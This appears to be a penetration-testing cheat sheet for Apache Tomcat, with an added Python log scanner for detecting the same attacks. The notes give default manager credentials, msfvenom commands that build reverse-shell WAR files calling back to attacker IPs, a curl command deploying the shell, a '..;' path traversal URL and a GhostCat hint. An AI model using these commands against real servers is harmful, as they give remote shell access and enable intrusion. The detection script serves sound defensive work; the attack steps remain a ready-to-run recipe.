Access /manager with default creds

Usually tomcat:s3cret

Then upload and deploy a reverse-shell WAR file:

#Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
#Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war

Upload via curl

curl --user 'tomcat:s3cret' --upload-file revshell.war 'localhost:8080/manager/deploy?path=/shell'

Tomcat path traversal

https://10.10.10.25/manager/status/..;/html/
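
Detection side of the notes above, as an added example that is not part of the original notes: it scans Tomcat access-log lines for the manager deploy request and the `..;` traversal shown here, plus repeated 401s on /manager. The log format (AccessLogValve `common` pattern), the threshold, the finding names and the sample lines are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+')
DEPLOY = re.compile(r'^/manager/(?:(?:text/)?deploy|html/upload)$')
AUTH_FAIL_THRESHOLD = 3  # assumed tuning value, adjust per environment

def effective_path(raw_path):
    """Approximate Tomcat's mapping: drop ';params' per segment, fold '..'."""
    out = []
    for seg in raw_path.split('/'):
        seg = unquote(seg.split(';', 1)[0])
        if seg == '..':
            del out[-1:]  # no-op when already at the root
        elif seg not in ('', '.'):
            out.append(seg)
    return '/' + '/'.join(out)

def scan(lines):
    """Return sorted (host, finding) pairs for access-log lines."""
    findings, auth_fail = set(), Counter()
    for m in filter(None, map(LINE.match, lines)):  # skip unparseable lines
        host, status = m['host'], m['status']
        raw_path = urlsplit(m['uri']).path
        path = effective_path(raw_path)
        if '..;' in raw_path:  # Tomcat reads "..;" as ".." plus an empty parameter
            findings.add((host, 'path-parameter-traversal'))
        if path == '/manager' or path.startswith('/manager/'):
            if status == '401':
                auth_fail[host] += 1
            if m['method'] in ('PUT', 'POST') and DEPLOY.match(path):
                verdict = 'war-deploy-ok' if status.startswith('2') else 'war-deploy-attempt'
                findings.add((host, verdict))
    findings.update((h, 'manager-auth-failures')
                    for h, n in auth_fail.items() if n >= AUTH_FAIL_THRESHOLD)
    return sorted(findings)

# Constructed sample lines (documentation IP ranges, not from a real host)
T = '[12/Mar/2024:10:15:01 +0000]'
SAMPLE = [f'203.0.113.7 - - {T} "GET /manager/html HTTP/1.1" 401 2473'] * 3 + [
    f'203.0.113.7 - tomcat {T} "PUT /manager/deploy?path=/shell HTTP/1.1" 200 41',
    f'198.51.100.9 - - {T} "GET /manager/status/..;/html/ HTTP/1.1" 401 2473',
    f'198.51.100.9 - - {T} "POST /manager/status/..;/html/upload HTTP/1.1" 403 961',
]

if __name__ == '__main__':
    print(scan(SAMPLE))
```

Matching on the resolved path rather than the raw URI is what lets the deploy rule catch an upload sent through the `..;` segment.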

If port 8009 is open, chances are the host is vulnerable to GhostCat.